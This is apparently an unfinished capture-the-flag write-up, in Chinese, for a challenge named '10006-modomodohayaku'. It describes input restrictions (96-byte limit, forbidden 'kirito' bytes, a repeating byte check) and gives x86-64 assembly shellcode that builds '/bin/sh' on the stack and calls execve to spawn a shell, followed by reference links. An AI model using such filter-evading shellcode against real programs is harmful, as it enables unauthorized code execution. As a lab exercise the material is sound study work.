# 10006-modomodohayaku 類似 10002，只是多了些限制： 輸入長度上限減為 96 不能含有 "kirito" 裡的任何字元，AKA 不能含有 `\x6b` `\x69` `\x72` `\x74` `\x6f`  `\x0c` `\x87` `\x63` 的檢查改成每 6 個一輪，且任一不符合就爆掉  ##### ==TODO== target ``` rax = 0x3b rdi = address of "/bin/sh" rsi = 0x0 rdx = 0x0 ``` --- ```asm /* reset registers */ xor eax, eax xor ebx, ebx //xor ecx, ecx //xor edx, edx /* Build the stack with /bin/sh */ mov bh, 0x1 /* shl * 2 */ //nop /* /bin/sh (ie bytes 47, 98, 105, 110, 47, 115, 104) */ /* (2F 62 69 6E 2F 73 68) */ mov ah, 0x6e /* n */ mov al, 0x69 /* i */ mul ebx mul ebx mov ah, 0x62 /* b */ mov al, 0x2f /* / */ push rcx /* push 00 */ push rax xor eax, eax //mov ah, 0x68 /* h */ mov al, 0x68 /* h */ mul ebx mul ebx mov ah, 0x73 /* s */ mov al, 0x2f /* / */ mov [rsp+4], eax /* system call */ xor eax, eax xor esi, esi mov al, 0x3b mov rdi, rsp syscall ``` ``` ``` ``` 0c 87 63 c0 XX XX ``` some ref - https://cs.brown.edu/courses/cs033/docs/guides/x64_cheatsheet.pdf compiler/decompiler - https://onlinedisassembler.com/odaweb/ - https://defuse.ca/online-x86-assembler.htm#disassembly